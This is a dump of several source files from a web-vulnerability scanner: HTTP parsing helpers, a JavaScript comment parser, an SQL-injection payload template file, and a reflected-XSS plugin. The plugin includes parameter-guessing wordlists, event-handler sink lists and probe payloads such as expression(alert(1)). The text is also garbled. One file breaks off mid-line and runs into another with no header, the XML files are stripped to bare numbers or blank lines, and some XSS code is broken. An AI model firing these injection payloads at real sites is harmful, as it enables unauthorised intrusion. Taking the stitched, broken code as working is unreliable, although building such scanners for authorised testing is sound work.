        url_info["params"] = parse_url.params
        url_info["query"] = parse_url.query
        url_info["host"] = parse_url.netloc
        url_info["query_dict"] = parse_qs(parse_url.query)
        if ":" in url_info["host"]:
            url_info["ip"] = url_info["host"].split(":")[0]
            url_info["port"] = url_info["host"].split(":")[1]
        if "https" in url:
            url_info["ssl"] = True
            url_info["base_url"] = "https://{0}".format(url_info["host"])
            if ":" not in url_info["host"]:
                url_info["port"] = 443
        else:
            url_info["ssl"] = False
            url_info["base_url"] = "http://{0}".format(url_info["host"])
            if ":" not in url_info["host"]:
                # Bug fix: the original did url_info["port"] = url_info["80"],
                # a guaranteed KeyError for any http url without an explicit
                # port. Default to 80, mirroring the 443 branch above.
                url_info["port"] = 80
        url_suffix = Utils.get_url_suffix(url)
        if url_suffix not in HTTPParser.STATIC_SUFFIXES:
            if url_suffix == "js":
                url_info["type"] = "js"
            elif url_suffix in ("jsp", "php", "asp", "aspx"):
                url_info["type"] = url_suffix
            else:
                url_info["type"] = "dynamic"
            url_info["gener_url"] = Utils.generalization(url)
        return url_info

    @staticmethod
    def flow_to_req(flow):
        """Serialize a mitmproxy request into a dict, including a raw
        HTTP-text rendering under ``raw``."""
        def raw(request):
            # rebuild request line + headers + body as plain text
            req_data = '%s %s %s\r\n' % (str(request.method), str(request.path), str(request.http_version))
            for k, v in request.headers.items():
                req_data += k + ': ' + v + '\r\n'
            req_data += '\r\n'
            req_data += str(request.raw_content)
            return req_data
        req = dict()
        req["host"] = flow.request.host
        req["method"] = flow.request.method
        req["scheme"] = flow.request.scheme
        req["authority"] = flow.request.authority
        req["path"] = flow.request.path
        req["http_version"] = flow.request.http_version
        req["headers"] = flow.request.headers
        req["text"] = str(flow.request.content)
        req["timestamp_start"] = flow.request.timestamp_start
        req["timestamp_end"] = flow.request.timestamp_end
        req["raw"] = raw(flow.request)
        return req

    @staticmethod
    def flow_to_rsp(flow):
        """Serialize a mitmproxy response into a dict; body is decoded as
        utf-8 with undecodable bytes ignored."""
        rsp = dict()
        rsp["status_code"] = flow.response.status_code
        rsp["reason"] = flow.response.reason
        rsp["headers"] = flow.response.headers
        rsp["text"] = str(flow.response.content.decode('utf-8', 'ignore'))
        rsp["timestamp_start"] = flow.response.timestamp_start
        rsp["timestamp_end"] = flow.response.timestamp_end
        return rsp

    @staticmethod
    def rsp_to_reqtext(rsp):
        """Render the request that produced a ``requests`` response as raw
        HTTP text (request line, headers, optional body)."""
        req = rsp.request
        req_data = '%s %s %s\r\n' % (str(req.method), str(req.path_url), str(http_version_map[rsp.raw.version]))
        for k, v in req.headers.items():
            req_data += k + ': ' + v + '\r\n'
        req_data += '\r\n'
        if req.body:
            req_data += str(req.body)
        return req_data

    @staticmethod
    def rsp_to_dict(response):
        """Reduce a ``requests`` response to the scanner's rsp dict."""
        rsp = dict()
        rsp["status_code"] = response.status_code
        rsp["headers"] = response.headers
        rsp["text"] = str(response.text)
        rsp['req'] = response.request
        return rsp

    @staticmethod
    def rsp_to_req_dict(response):
        """Reduce the request behind a ``requests`` response to the
        scanner's req dict."""
        request = response.request
        url = request.url
        req = dict()
        parse_url = urlparse(url)
        req["url"] = request.url
        req["params"] = parse_url.params
        req["query"] = parse_url.query
        req["host"] = parse_url.netloc
        req["method"] = request.method
        # path_url includes the query string; the original first assigned
        # parse_url.path and immediately overwrote it — dead code removed
        req["path"] = request.path_url
        req["http_version"] = http_version_map[response.raw.version]
        req["headers"] = request.headers
        req["text"] = str(request.body)
        req["raw"] = HTTPParser.rsp_to_reqtext(response)
        return req

    @staticmethod
    def get_res_req_by_url(url):
        """GET *url* with a random UA; returns (rsp_dict, req_dict) on
        success or (None, None) on any failure."""
        headers = dict()
        headers["User-Agent"] = Utils.get_random_ua()
        headers["Connection"] = "close"
        try:
            response = requests.get(url, headers=headers, timeout=10)
            return HTTPParser.rsp_to_dict(response), HTTPParser.rsp_to_req_dict(response)
        except Exception:
            # narrowed from a bare ``except:`` so SystemExit /
            # KeyboardInterrupt are no longer swallowed
            logger.debug(traceback.format_exc())
            return None, None
203 |
--------------------------------------------------------------------------------
/lib/jscontext.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # @Time : 2020/4/8 10:13 AM
4 | # @Author : w8ay
5 | # @File : jscontext.py
6 |
7 | import pyjsparser
8 | from pyjsparser import parse
9 |
10 |
class JsParseError(Exception):
    """Exception raised for errors in the input.

    Attributes:
        expression -- input expression in which the error occurred
        message -- explanation of the error
    """

    def __init__(self, expression, message):
        # BUGFIX: initialise the base Exception so that str(e), repr(e)
        # and e.args carry the message instead of being empty.
        super().__init__(message)
        self.expression = expression
        self.message = message
22 |
23 |
# Unicode code points treated as whitespace by the comment scanner:
# space, tab, vertical tab, form feed, NBSP, the typographic spaces
# U+2000..U+200A, narrow/medium spaces, ideographic space and the BOM.
WHITE_SPACE = {0x20, 0x09, 0x0B, 0x0C, 0xA0, 0x1680, 0x180E, 0x2000, 0x2001, 0x2002, 0x2003, 0x2004, 0x2005, 0x2006,
               0x2007, 0x2008, 0x2009, 0x200A, 0x202F, 0x205F, 0x3000, 0xFEFF}

# Code points that end a line: LF, CR, LINE SEPARATOR (U+2028) and
# PARAGRAPH SEPARATOR (U+2029).
LINE_TERMINATORS = {0x0A, 0x0D, 0x2028, 0x2029}


def isLineTerminator(ch):
    """Return True when code point *ch* terminates a line."""
    return ch in LINE_TERMINATORS


def isWhiteSpace(ch):
    """Return True when code point *ch* is (non-terminating) whitespace."""
    return ch in WHITE_SPACE
36 |
37 |
def skipMultiLineComment(index, length, source):
    """Scan *source* for the body of a ``/* ... */`` block comment.

    ``index`` must point just past the opening ``/*`` and ``length`` is the
    total length of *source*.  Returns ``{'type': 'Block', 'value': <text>}``
    when the closing ``*/`` is found, or ``None`` when the comment is
    unterminated.
    """
    start = index
    while index < length:
        ch = ord(source[index])
        if isLineTerminator(ch):
            # Treat CRLF as a single terminator.
            # BUGFIX: bounds-check before peeking at the next character —
            # a CR as the final character used to raise IndexError.
            if ch == 0x0D and index + 1 < length and ord(source[index + 1]) == 0x0A:
                index += 1
            index += 1
        elif ch == 0x2A:
            # Block comment ends with '*/'.
            # BUGFIX: bounds-check here too — a trailing '*' used to
            # raise IndexError instead of reporting "unterminated".
            if index + 1 < length and ord(source[index + 1]) == 0x2F:
                index += 2
                return {
                    'type': 'Block',
                    'value': source[start:index - 2],
                }

            index += 1
        else:
            index += 1
    # Unterminated comment.
    return None
59 |
60 |
def skipSingleLineComment(offset, index, length, source):
    """Scan *source* for the rest of a single-line comment.

    ``offset`` is the length of the comment opener (e.g. 2 for ``//``,
    3 for ``-->``) and ``index`` points just past it.  Returns
    ``{'type': 'Line', 'value': <text>}`` once a line terminator is
    reached, or ``None`` when the comment runs to the end of the input.
    """
    start = index - offset
    while index < length:
        ch = ord(source[index])
        index += 1
        if isLineTerminator(ch):
            # Swallow the LF of a CRLF pair as part of the terminator.
            # BUGFIX: bounds-check before peeking — a CR as the final
            # character used to raise IndexError.
            if ch == 13 and index < length and ord(source[index]) == 10:
                index += 1
            return {
                'type': 'Line',
                'value': source[start + offset:index - 1],
            }
    # Comment extends to the end of the source.
    return None
74 |
75 |
76 | def getComment(scripts):
77 | '''
78 | 获得JavaScript中注释内容以及注释类型
79 | :param scripts:
80 | :return:
81 | '''
82 | length = len(scripts)
83 | index = 0
84 | start = True
85 | comments = []
86 | while index < length:
87 | ret = None
88 | ch = ord(scripts[index])
89 | if isWhiteSpace(ch):
90 | index += 1
91 | elif isLineTerminator(ch):
92 | index += 1
93 | if (ch == 0x0D and ord(scripts[index]) == 0x0A):
94 | index += 1
95 | start = True
96 | elif (ch == 0x2F): # U+002F is '/'
97 | ch = ord(scripts[index + 1])
98 | if (ch == 0x2F):
99 | index += 2
100 | ret = skipSingleLineComment(2, index, length, scripts)
101 | start = True
102 | elif (ch == 0x2A): # U+002A is '*'
103 | index += 2
104 | ret = skipMultiLineComment(index, length, scripts)
105 | else:
106 | break
107 | elif (start and ch == 0x2D): # U+002D is '-'
108 | # U+003E is '>'
109 | if (ord(scripts[index + 1]) == 0x2D) and (ord(
110 | scripts[index + 2]) == 0x3E):
111 | # '-->' is a single-line comment
112 | index += 3
113 | ret = skipSingleLineComment(3, index, length, scripts)
114 | else:
115 | break
116 | elif (ch == 0x3C): # U+003C is '<'
117 | if scripts[index + 1:index + 4] == '!--':
118 | #
61 |
62 |
63 |
64 |
65 |
66 | 1
67 | 1
68 | 1,2
69 | 2
70 |
71 | AND '[RANDSTR]'='[RANDSTR]'
72 |
73 |
74 |
75 | 1
76 | 1
77 | 1,2
78 | 2
79 | ')
80 | AND ('[RANDSTR]'='[RANDSTR]
81 |
82 |
83 |
84 | 2
85 | 1
86 | 1,2
87 | 2
88 | '))
89 | AND (('[RANDSTR]'='[RANDSTR]
90 |
91 |
92 |
93 | 3
94 | 1
95 | 1,2
96 | 2
97 | ')))
98 | AND ((('[RANDSTR]'='[RANDSTR]
99 |
100 |
101 |
102 | 1
103 | 1
104 | 1,2
105 | 2
106 | '
107 | AND '[RANDSTR]'='[RANDSTR]
108 |
109 |
110 |
111 | 2
112 | 1
113 | 1,2
114 | 3
115 | ')
116 | AND ('[RANDSTR]' LIKE '[RANDSTR]
117 |
118 |
119 |
120 | 3
121 | 1
122 | 1,2
123 | 3
124 | '))
125 | AND (('[RANDSTR]' LIKE '[RANDSTR]
126 |
127 |
128 |
129 | 4
130 | 1
131 | 1,2
132 | 3
133 | ')))
134 | AND ((('[RANDSTR]' LIKE '[RANDSTR]
135 |
136 |
137 |
138 | 2
139 | 1
140 | 1,2
141 | 3
142 | %'
143 | AND '[RANDSTR]%'='[RANDSTR]
144 |
145 |
146 |
147 | 2
148 | 1
149 | 1,2
150 | 3
151 | '
152 | AND '[RANDSTR]' LIKE '[RANDSTR]
153 |
154 |
155 |
156 | 2
157 | 1
158 | 1,2
159 | 4
160 | ")
161 | AND ("[RANDSTR]"="[RANDSTR]
162 |
163 |
164 |
165 | 3
166 | 1
167 | 1,2
168 | 4
169 | "))
170 | AND (("[RANDSTR]"="[RANDSTR]
171 |
172 |
173 |
174 | 4
175 | 1
176 | 1,2
177 | 4
178 | ")))
179 | AND ((("[RANDSTR]"="[RANDSTR]
180 |
181 |
182 |
183 | 2
184 | 1
185 | 1,2
186 | 4
187 | "
188 | AND "[RANDSTR]"="[RANDSTR]
189 |
190 |
191 |
192 | 3
193 | 1
194 | 1,2
195 | 5
196 | ")
197 | AND ("[RANDSTR]" LIKE "[RANDSTR]
198 |
199 |
200 |
201 | 4
202 | 1
203 | 1,2
204 | 5
205 | "))
206 | AND (("[RANDSTR]" LIKE "[RANDSTR]
207 |
208 |
209 |
210 | 5
211 | 1
212 | 1,2
213 | 5
214 | ")))
215 | AND ((("[RANDSTR]" LIKE "[RANDSTR]
216 |
217 |
218 |
219 | 3
220 | 1
221 | 1,2
222 | 5
223 | "
224 | AND "[RANDSTR]" LIKE "[RANDSTR]
225 |
226 |
227 |
228 |
229 | 3
230 | 1
231 | 1,2
232 | 2
233 | '
234 | OR '[RANDSTR1]'='[RANDSTR2]
235 |
236 |
237 |
238 |
239 |
240 | 5
241 | 9
242 | 1,2
243 | 2
244 | ') WHERE [RANDNUM]=[RANDNUM]
245 | [GENERIC_SQL_COMMENT]
246 |
247 |
248 |
249 | 5
250 | 9
251 | 1,2
252 | 2
253 | ") WHERE [RANDNUM]=[RANDNUM]
254 | [GENERIC_SQL_COMMENT]
255 |
256 |
257 |
258 | 4
259 | 9
260 | 1,2
261 | 1
262 | ) WHERE [RANDNUM]=[RANDNUM]
263 | [GENERIC_SQL_COMMENT]
264 |
265 |
266 |
267 | 4
268 | 9
269 | 1,2
270 | 2
271 | ' WHERE [RANDNUM]=[RANDNUM]
272 | [GENERIC_SQL_COMMENT]
273 |
274 |
275 |
276 | 5
277 | 9
278 | 1,2
279 | 4
280 | " WHERE [RANDNUM]=[RANDNUM]
281 | [GENERIC_SQL_COMMENT]
282 |
283 |
284 |
285 | 4
286 | 9
287 | 1,2
288 | 1
289 | WHERE [RANDNUM]=[RANDNUM]
290 | [GENERIC_SQL_COMMENT]
291 |
292 |
293 |
294 | 5
295 | 9
296 | 1
297 | 2
298 | '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
299 | )||'
300 |
301 |
302 |
303 | 5
304 | 9
305 | 1
306 | 2
307 | '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
308 | )||'
309 |
310 |
311 |
312 | 5
313 | 9
314 | 1
315 | 2
316 | '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
317 | )+'
318 |
319 |
320 |
321 | 5
322 | 9
323 | 1
324 | 2
325 | ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
326 | )||
327 |
328 |
329 |
330 | 5
331 | 9
332 | 1
333 | 2
334 | ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
335 | )||
336 |
337 |
338 |
339 | 5
340 | 9
341 | 1
342 | 1
343 | +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
344 | )+
345 |
346 |
347 |
348 | 5
349 | 9
350 | 1
351 | 2
352 | +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
353 | )+
354 |
355 |
356 |
357 |
358 |
359 | 5
360 | 1
361 | 1,2
362 | 2
363 | ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
364 | [GENERIC_SQL_COMMENT]
365 |
366 |
367 |
368 | 5
369 | 1
370 | 1,2
371 | 2
372 | ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
373 | [GENERIC_SQL_COMMENT]
374 |
375 |
376 |
377 | 5
378 | 1
379 | 1,2
380 | 1
381 | )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
382 | [GENERIC_SQL_COMMENT]
383 |
384 |
385 |
386 | 4
387 | 1
388 | 1,2
389 | 2
390 | ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
391 | [GENERIC_SQL_COMMENT]
392 |
393 |
394 |
395 | 5
396 | 1
397 | 1,2
398 | 4
399 | ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
400 | [GENERIC_SQL_COMMENT]
401 |
402 |
403 |
404 | 4
405 | 1
406 | 1,2
407 | 1
408 | ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
409 | [GENERIC_SQL_COMMENT]
410 |
411 |
412 |
413 | 4
414 | 1
415 | 1
416 | 1
417 | ` WHERE [RANDNUM]=[RANDNUM]
418 | [GENERIC_SQL_COMMENT]
419 |
420 |
421 |
422 | 5
423 | 1
424 | 1
425 | 1
426 | `) WHERE [RANDNUM]=[RANDNUM]
427 | [GENERIC_SQL_COMMENT]
428 |
429 |
430 |
431 |
--------------------------------------------------------------------------------
/plugins/general/scripts/sqli/errors.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
--------------------------------------------------------------------------------
/plugins/general/scripts/xss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-03-30 16:12:12
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 18:09:23
7 | '''
8 |
9 |
10 | from plugins.scan import Base
11 | from lib.utils import Utils
12 | from lib.html_parser import SearchInputInResponse, random_upper
13 | from lib.jscontext import SearchInputInScript
14 | from lib.http_parser import HTTPParser
15 | import json
16 | import copy
17 |
18 | # copy https://github.com/w-digital-scanner/w13scan/blob/master/W13SCAN/scanners/PerFile/xss.py
19 |
20 | '''
21 | ## 位置与payload需要的字符串
22 |
23 | | 属性 | 必选 | 可选 |
24 | | ------------ | --------------------------------------------------- | -------------------------- |
25 | | HTML标签 | <> | |
26 | | HTML属性 | 空格和等于号(=) | 单引号(')和双引号(")是可选 |
27 | | HTML属性值 | 直接有效的Payload或者需要逗号(,) | |
28 | | HTML文本节点 | <> 字符需要转义文本区域 | |
29 | | HTML注释 | <>!字符必须用来转义注释 | |
30 | | Style | <> 需要转义样式 | |
31 | | Style 属性 | <,>,"字符需要转义文本 | |
32 | | Href 属性 | 直接构造payload,或者“需要转义文本 | |
33 | | JS 节点 | <,>需要转义script,其他特殊的字符来闭合JS变量或函数 | |
34 |
35 | 参考 https://mp.weixin.qq.com/s?__biz=MzU2NzcwNTY3Mg==&mid=2247483698&idx=1&sn=9733c6078516c34963a4c0486c6d1872&chksm=fc986815cbefe103975c2e554ef2667b931e14b2d1dcca407af9edbad83ea72f3ac88efd8d22&mpshare=1&scene=1&srcid=&sharer_sharetime=1588849508551&sharer_shareid=19604935512cdb60a84a4a498605fc8d&key=e4739a048b456af8bbf436c6fb2173754f53fcd63e766a439186e0a2433cd084a69e23876cc446623cb005c3c9fed06af918b7b082f604e7a23c136961d5a1e633f4a60b65b241dea730f7c13578ea94&ascene=1&uin=MTM3MzQ3ODE0MA%3D%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=AZ%2F8pd18PHTzKD6ytyi7PPk%3D&pass_ticket=ssxjxDrN0aRCdy2TGXV37%2Bg0cYgtEknB95Y1dXjxGOtpxjCYC6wfPOq5QXvs3lzE
36 | https://brutelogic.com.br/knoxss.html
37 |
38 | '''
# Hidden parameters
# TOP_RISK_GET_PARAMS = {"id", 'action', 'type', 'm', 'callback', 'cb'}
# NOTE(review): blindParams duplicates BLIND_PARAMS below and is not
# referenced anywhere in the visible code — confirm before removing.
blindParams = [  # common parameter names to be brute-forced for parameter discovery
    'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
    'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
    'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
    'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
    'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
    'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
    'height', 'add', 'result', 'log', 'demo', 'example', 'message', 'id', 'action', 'type', 'm', 'callback', 'cb']

'''

'''

# Same wordlist as blindParams above; this is the copy actually used by
# Scan.test_echo for hidden-parameter discovery.
BLIND_PARAMS = [  # common parameter names to be brute-forced for parameter discovery
    'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
    'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
    'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
    'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
    'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
    'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
    'height', 'add', 'result', 'log', 'demo', 'example', 'message', 'id', 'action', 'type', 'm', 'callback', 'cb']

# HTML event-handler attribute names ("on*") that can act as script
# execution sinks when reflected into an attribute context.
XSS_EVAL_ATTITUDES = ['onbeforeonload', 'onsubmit', 'ondragdrop', 'oncommand', 'onbeforeeditfocus', 'onkeypress',
                      'onoverflow', 'ontimeupdate', 'onreset', 'ondragstart', 'onpagehide', 'onunhandledrejection',
                      'oncopy',
                      'onwaiting', 'onselectstart', 'onplay', 'onpageshow', 'ontoggle', 'oncontextmenu', 'oncanplay',
                      'onbeforepaste', 'ongesturestart', 'onafterupdate', 'onsearch', 'onseeking',
                      'onanimationiteration',
                      'onbroadcast', 'oncellchange', 'onoffline', 'ondraggesture', 'onbeforeprint', 'onactivate',
                      'onbeforedeactivate', 'onhelp', 'ondrop', 'onrowenter', 'onpointercancel', 'onabort',
                      'onmouseup',
                      'onbeforeupdate', 'onchange', 'ondatasetcomplete', 'onanimationend', 'onpointerdown',
                      'onlostpointercapture', 'onanimationcancel', 'onreadystatechange', 'ontouchleave',
                      'onloadstart',
                      'ondrag', 'ontransitioncancel', 'ondragleave', 'onbeforecut', 'onpopuphiding', 'onprogress',
                      'ongotpointercapture', 'onfocusout', 'ontouchend', 'onresize', 'ononline', 'onclick',
                      'ondataavailable', 'onformchange', 'onredo', 'ondragend', 'onfocusin', 'onundo', 'onrowexit',
                      'onstalled', 'oninput', 'onmousewheel', 'onforminput', 'onselect', 'onpointerleave', 'onstop',
                      'ontouchenter', 'onsuspend', 'onoverflowchanged', 'onunload', 'onmouseleave',
                      'onanimationstart',
                      'onstorage', 'onpopstate', 'onmouseout', 'ontransitionrun', 'onauxclick', 'onpointerenter',
                      'onkeydown', 'onseeked', 'onemptied', 'onpointerup', 'onpaste', 'ongestureend', 'oninvalid',
                      'ondragenter', 'onfinish', 'oncut', 'onhashchange', 'ontouchcancel', 'onbeforeactivate',
                      'onafterprint', 'oncanplaythrough', 'onhaschange', 'onscroll', 'onended', 'onloadedmetadata',
                      'ontouchmove', 'onmouseover', 'onbeforeunload', 'onloadend', 'ondragover', 'onkeyup',
                      'onmessage',
                      'onpopuphidden', 'onbeforecopy', 'onclose', 'onvolumechange', 'onpropertychange', 'ondblclick',
                      'onmousedown', 'onrowinserted', 'onpopupshowing', 'oncommandupdate', 'onerrorupdate',
                      'onpopupshown',
                      'ondurationchange', 'onbounce', 'onerror', 'onend', 'onblur', 'onfilterchange', 'onload',
                      'onstart',
                      'onunderflow', 'ondragexit', 'ontransitionend', 'ondeactivate', 'ontouchstart', 'onpointerout',
                      'onpointermove', 'onwheel', 'onpointerover', 'onloadeddata', 'onpause', 'onrepeat',
                      'onmouseenter',
                      'ondatasetchanged', 'onbegin', 'onmousemove', 'onratechange', 'ongesturechange',
                      'onlosecapture',
                      'onplaying', 'onfocus', 'onrowsdelete']
98 |
class Scan(Base):
    """Reflected XSS scan plugin (adapted from w13scan's xss scanner)."""

    def __init__(self, report_work):
        super().__init__(report_work)
        # Name used to tag findings produced by this plugin.
        self.plugins_name = "xss"
103 |
104 |
105 | def test_echo(self, url_info):
106 | echo_query_list = list()
107 | query_dict = copy.copy(url_info.get("query_dict"))
108 | headers = url_info.get("headers")
109 | method = url_info.get("method")
110 | base_url = url_info.get("base_url")
111 | origin_url = url_info.get("origin_url")
112 | # 混合测试的参数
113 | query_list = list(query_dict.keys())+BLIND_PARAMS
114 | for query in query_list:
115 | query_dict[query] = Utils.gen_random_str()
116 | #url
117 | data = None
118 | if method=="GET":
119 | fix_query_str = ""
120 | for key,value in query_dict.items():
121 | fix_query_str += key + "=" + value+"&"
122 | if fix_query_str.endswith("&"):
123 | fix_query_str = fix_query_str[:-1]
124 | if "?" in origin_url:
125 | origin_query = origin_url.split("?")[-1]
126 | url = origin_url.replace(origin_query, fix_query_str)
127 | else:
128 | # 隐藏参数
129 | finx_query_str = "?"
130 | for query in query_dict:
131 | finx_query_str += query + "=" + query_dict[query][0]+"&"
132 | if finx_query_str.endswith("&"):
133 | finx_query_str = finx_query_str[:-1]
134 | url = origin_url+"?"+finx_query_str
135 | else: # post
136 | url = base_url
137 | if url_info.get("json"):
138 | # 如果是json的
139 | data = json.dumps(query_dict)
140 | else:
141 | # 普通post的
142 | data = ""
143 | for key,value in query_dict.items():
144 | data += key + "=" + value+"&"
145 | if data.endswith("&"):
146 | data = data[:-1]
147 | # 发送请求
148 | response = self.request(url, method=method, data=data, headers=headers, timeout=10)
149 | for key, value in query_dict.items():
150 | if value in response.text:
151 | self.logger.debug("find echo key: {0}".format(key))
152 | locations = SearchInputInResponse( value, response.text)
153 | self.logger.debug("locations: {0}".format(locations))
154 | if locations:
155 | echo_query_list.append({
156 | "key": key,
157 | "value": value,
158 | "locations": locations
159 | })
160 | return echo_query_list
161 |
162 |
163 | def fix_query_get_response(self, url_info, echo_query, payload):
164 | query_dict = url_info.get("query_dict")
165 | headers = url_info.get("headers")
166 | method = url_info.get("method")
167 | base_url = url_info.get("base_url")
168 | origin_url = url_info.get("origin_url")
169 | if echo_query in query_dict.keys():
170 | origin_query = echo_query+"="+query_dict[echo_query][0]
171 | payload_query = echo_query+"="+payload
172 | else:
173 | # 隐藏参数
174 | origin_query = ""
175 | for query in query_dict:
176 | origin_query += query + "=" + query_dict[query][0]+"&"
177 | if origin_query.endswith("&"):
178 | origin_query = origin_query[:-1]
179 | payload_query = origin_query+"&"+echo_query+"="+payload
180 | self.logger.debug("origin_url: {0}".format(origin_url))
181 | self.logger.debug("origin_query: {0}".format(origin_query))
182 | self.logger.debug("payload_query: {0}".format(payload_query))
183 | #url
184 | if method=="GET":
185 | url = origin_url.replace(origin_query, payload_query)
186 | self.logger.debug("url: {0}".format(url))
187 | else: # post
188 | url = base_url
189 | if url_info.get("json"):
190 | # 如果是json的
191 | query_dict[echo_query] = payload
192 | data = json.dumps(query_dict)
193 | else:
194 | # 普通post的
195 | data.replace(origin_query, payload_query)
196 | return self.request(url, method=method, headers=headers)
197 |
198 | def verify(self, url_info, req, rsp, violent=False):
199 | '''
200 | xss 检测
201 |
202 | '''
203 | echo_query_list = self.test_echo(url_info)
204 | if len(echo_query_list)==0:
205 | return
206 | for echo_query_info in echo_query_list:
207 | locations = echo_query_info.get('locations')
208 | echo_query = echo_query_info.get("key")
209 | xsschecker = echo_query_info.get('value')
210 | if not locations:
211 | continue
212 | for item in locations:
213 | _type = item["type"]
214 | details = item["details"]
215 | if _type == "html":
216 | if details["tagname"] == "style":
217 | payload = "expression(a({}))".format(Utils.gen_random_str())
218 | response = self.fix_query_get_response(url_info, echo_query, payload)
219 | _locations = SearchInputInResponse(payload, response.text)
220 | for _item in _locations:
221 | if payload in _item["details"]["content"] and _item["details"]["tagname"] == "style":
222 | result = {
223 | "plugins": self.plugins_name,
224 | "url": url_info.get("origin_url"),
225 | "req": HTTPParser.rsp_to_reqtext(response),
226 | "payload": echo_query+"="+expression(alert(1)),
227 | "desc": "可能存在xss E下可执行的表达式 expression(alert(1))"
228 | }
229 | self.print_result(result)
230 | self.to_result(result)
231 | break
232 | flag = Utils.gen_random_str(7)
233 | payload = "{}><{}>".format(random_upper(details["tagname"]), flag)
234 | truepayload = "{}>{}".format(random_upper(details["tagname"]), "